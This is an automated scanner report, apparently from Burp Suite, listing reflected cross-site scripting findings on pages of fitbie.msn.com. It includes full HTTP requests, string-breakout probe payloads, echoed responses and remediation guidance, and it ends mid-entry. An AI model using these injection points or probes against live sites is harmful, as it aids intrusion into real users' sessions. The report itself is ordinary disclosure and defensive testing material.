CWE-79, XSS, Cross Site Scripting, fitbie.msn.com

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:

Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc).

In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.

1.1. http://fitbie.msn.com/cardio/seize-your-saturdays [REST URL parameter 2] next

Summary

Severity:	High
Confidence:	Firm
Host:	http://fitbie.msn.com
Path:	/cardio/seize-your-saturdays

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1cbf1'%3bce4a476e1ed was submitted in the REST URL parameter 2. This input was echoed as 1cbf1';ce4a476e1ed in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cardio/seize-your-saturdays1cbf1'%3bce4a476e1ed HTTP/1.1
Host: fitbie.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; s_cc=true; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; fsbstat=1; v1st=F66AF379BC0B14B4; SRCHHPGUSR=AS=1; _HOP=I=1&TS=1297606884; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:38:14 +0000
ETag: "1297607894-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=3600
Expires: Sun, 13 Feb 2011 15:38:15 GMT
Date: Sun, 13 Feb 2011 14:38:15 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 49222

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
<a href="/flag/flag/favorites/seize-your-saturdays1cbf1';ce4a476e1ed?destination=node%2Fseize-your-saturdays1cbf1';ce4a476e1ed&" title="Add this post to your favorites" class="flag flag-action flag-link-toggle" rel="nofollow">
...[SNIP]...

1.2. http://fitbie.msn.com/cutting-calories/tips/6-food-mistakes-even-healthy-eaters-make [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://fitbie.msn.com
Path:	/cutting-calories/tips/6-food-mistakes-even-healthy-eaters-make

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload eeb0b'%3b9001904ad12 was submitted in the REST URL parameter 2. This input was echoed as eeb0b';9001904ad12 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET /cutting-calories/tipseeb0b'%3b9001904ad12/6-food-mistakes-even-healthy-eaters-make HTTP/1.1
Host: fitbie.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; s_cc=true; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; fsbstat=1; v1st=F66AF379BC0B14B4; SRCHHPGUSR=AS=1; _HOP=I=1&TS=1297606884; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:36:37 +0000
ETag: "1297607797-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=3600
Expires: Sun, 13 Feb 2011 15:36:38 GMT
Date: Sun, 13 Feb 2011 14:36:38 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 49340

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
<a href="/flag/flag/favorites/tipseeb0b';9001904ad12?destination=node%2Ftipseeb0b';9001904ad12&" title="Add this post to your favorites" class="flag flag-action flag-link-toggle" rel="nofollow">
...[SNIP]...

1.3. http://fitbie.msn.com/fit_tools/daily_calories [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://fitbie.msn.com
Path:	/fit_tools/daily_calories

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a2bfc'%3b4eaeaddbc3 was submitted in the REST URL parameter 2. This input was echoed as a2bfc';4eaeaddbc3 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET /fit_tools/daily_caloriesa2bfc'%3b4eaeaddbc3 HTTP/1.1
Host: fitbie.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Fri, 11 Feb 2011 21:10:01 +0000
ETag: "1297458601-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=3600
Expires: Fri, 11 Feb 2011 22:10:01 GMT
Date: Fri, 11 Feb 2011 21:10:01 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 63639

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
<a href="/flag/flag/favorites/daily_caloriesa2bfc';4eaeaddbc3?destination=node%2Fdaily_caloriesa2bfc';4eaeaddbc3&" title="Add this post to your favorites" class="flag flag-action flag-link-toggle" rel="nofollow">
...[SNIP]...

1.4. http://fitbie.msn.com/fitness-tips/tips/10-bizarre-side-effects-exercise [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://fitbie.msn.com
Path:	/fitness-tips/tips/10-bizarre-side-effects-exercise

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c8434'%3bfe291e813f7 was submitted in the REST URL parameter 2. This input was echoed as c8434';fe291e813f7 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET /fitness-tips/tipsc8434'%3bfe291e813f7/10-bizarre-side-effects-exercise HTTP/1.1
Host: fitbie.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; s_cc=true; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; fsbstat=1; v1st=F66AF379BC0B14B4; SRCHHPGUSR=AS=1; _HOP=I=1&TS=1297606884; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:37:45 +0000
ETag: "1297607865-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=3600
Expires: Sun, 13 Feb 2011 15:37:46 GMT
Date: Sun, 13 Feb 2011 14:37:46 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 49288

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
<a href="/flag/flag/favorites/tipsc8434';fe291e813f7?destination=node%2Ftipsc8434';fe291e813f7&" title="Add this post to your favorites" class="flag flag-action flag-link-toggle" rel="nofollow">
...[SNIP]...

1.5. http://fitbie.msn.com/get-fit/anytime-anywhere-yoga [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://fitbie.msn.com
Path:	/get-fit/anytime-anywhere-yoga

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 32eff'%3b00652598ff was submitted in the REST URL parameter 2. This input was echoed as 32eff';00652598ff in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET /get-fit/anytime-anywhere-yoga32eff'%3b00652598ff HTTP/1.1
Host: fitbie.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Fri, 11 Feb 2011 21:10:00 +0000
ETag: "1297458600-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=3600
Expires: Fri, 11 Feb 2011 22:10:01 GMT
Date: Fri, 11 Feb 2011 21:10:01 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 51037

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
<a href="/flag/flag/favorites/anytime-anywhere-yoga32eff';00652598ff?destination=node%2Fanytime-anywhere-yoga32eff';00652598ff&" title="Add this post to your favorites" class="flag flag-action flag-link-toggle" rel="nofollow">
...[SNIP]...

1.6. http://fitbie.msn.com/get-fit/belly-abs [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://fitbie.msn.com
Path:	/get-fit/belly-abs

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 270c8'%3baff2528c191 was submitted in the REST URL parameter 2. This input was echoed as 270c8';aff2528c191 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET /get-fit/belly-abs270c8'%3baff2528c191 HTTP/1.1
Host: fitbie.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; s_cc=true; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; fsbstat=1; v1st=F66AF379BC0B14B4; SRCHHPGUSR=AS=1; _HOP=I=1&TS=1297606884; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:32:29 +0000
ETag: "1297607549-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=3600
Expires: Sun, 13 Feb 2011 15:32:30 GMT
Date: Sun, 13 Feb 2011 14:32:30 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 49161

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
<a href="/flag/flag/favorites/belly-abs270c8';aff2528c191?destination=node%2Fbelly-abs270c8';aff2528c191&" title="Add this post to your favorites" class="flag flag-action flag-link-toggle" rel="nofollow">
...[SNIP]...

1.7. http://fitbie.msn.com/get-fit/cardio [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://fitbie.msn.com
Path:	/get-fit/cardio

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 958ff'%3b9e9fbc2f957 was submitted in the REST URL parameter 2. This input was echoed as 958ff';9e9fbc2f957 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET /get-fit/cardio958ff'%3b9e9fbc2f957 HTTP/1.1
Host: fitbie.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; s_cc=true; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; fsbstat=1; v1st=F66AF379BC0B14B4; SRCHHPGUSR=AS=1; _HOP=I=1&TS=1297606884; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:33:29 +0000
ETag: "1297607609-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=3600
Expires: Sun, 13 Feb 2011 15:33:29 GMT
Date: Sun, 13 Feb 2011 14:33:29 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 49143

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
<a href="/flag/flag/favorites/cardio958ff';9e9fbc2f957?destination=node%2Fcardio958ff';9e9fbc2f957&" title="Add this post to your favorites" class="flag flag-action flag-link-toggle" rel="nofollow">
...[SNIP]...

1.8. http://fitbie.msn.com/get-fit/men [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://fitbie.msn.com
Path:	/get-fit/men

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 66306'%3b9c7c60c12cc was submitted in the REST URL parameter 2. This input was echoed as 66306';9c7c60c12cc in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET /get-fit/men66306'%3b9c7c60c12cc HTTP/1.1
Host: fitbie.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; s_cc=true; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; fsbstat=1; v1st=F66AF379BC0B14B4; SRCHHPGUSR=AS=1; _HOP=I=1&TS=1297606884; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:34:40 +0000
ETag: "1297607680-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=3600
Expires: Sun, 13 Feb 2011 15:34:40 GMT
Date: Sun, 13 Feb 2011 14:34:40 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 49125

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
<a href="/flag/flag/favorites/men66306';9c7c60c12cc?destination=node%2Fmen66306';9c7c60c12cc&" title="Add this post to your favorites" class="flag flag-action flag-link-toggle" rel="nofollow">
...[SNIP]...

1.9. http://fitbie.msn.com/get-fit/reveal-your-abs-good [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://fitbie.msn.com
Path:	/get-fit/reveal-your-abs-good

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fabaa'%3bcb57fb69a4d was submitted in the REST URL parameter 2. This input was echoed as fabaa';cb57fb69a4d in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

